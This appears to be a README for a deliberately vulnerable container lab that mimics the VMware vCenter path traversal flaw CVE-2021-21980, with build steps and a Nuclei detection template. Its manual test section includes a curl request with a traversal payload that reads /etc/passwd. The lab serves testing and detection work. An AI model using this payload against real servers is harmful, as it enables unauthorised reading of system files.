Share
## https://sploitus.com/exploit?id=145A7CD4-B616-58BF-8A2F-1B0C004BF5D3
# CVE-2021-21980 Vulnerable Test Environment
## Overview
Realistic test environment simulating VMware vSphere Web Client path traversal vulnerability.
**โ ๏ธ WARNING:** Vulnerable test environment. Do NOT expose to internet!
## Quick Start
### Build and Run
```bash
podman build -t vcenter-lab .
podman run -d -p 443:443 --name vcenter-lab vcenter-lab
```
### Test Manually
```bash
curl -k "https://localhost/ui/vic-rest/services/containerView?id=../../../etc/passwd"
```
### Test with Nuclei
```bash
nuclei -t CVE-2021-21980.yaml -u https://localhost -debug
```
## What Makes This Different from Mock Servers
โ
**Actually reads files** from container filesystem using Python file I/O
โ
**Realistic behavior** - Handles path traversal like real vSphere
โ
**VMware headers** - Includes `Server: VMware-HTTP-Server/1.0`
โ
**SSL/TLS** - Self-signed certificate generation
โ
**Not hardcoded** - Returns actual file contents
## Vulnerability Details
- **CVE:** CVE-2021-21980
- **Severity:** High (CVSS 7.5)
- **Type:** Path Traversal / Arbitrary File Read
- **Affected:** VMware vCenter Server 7.0, 6.7, 6.5 (unpatched)
## Files
- `Dockerfile` - Container build configuration
- `server.py` - Vulnerable Flask application
- `CVE-2021-21980.yaml` - Nuclei detection template
- `README.md` - This file
## Validation Proof
This lab was validated with Nuclei showing:
- Successful detection of vulnerability
- Actual file reading (not mock responses)
- Complete HTTP request/response traces in debug mode
## Cleanup
```bash
podman stop vcenter-lab && podman rm vcenter-lab
```
## References
- https://www.vmware.com/security/advisories/VMSA-2021-0002.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-21980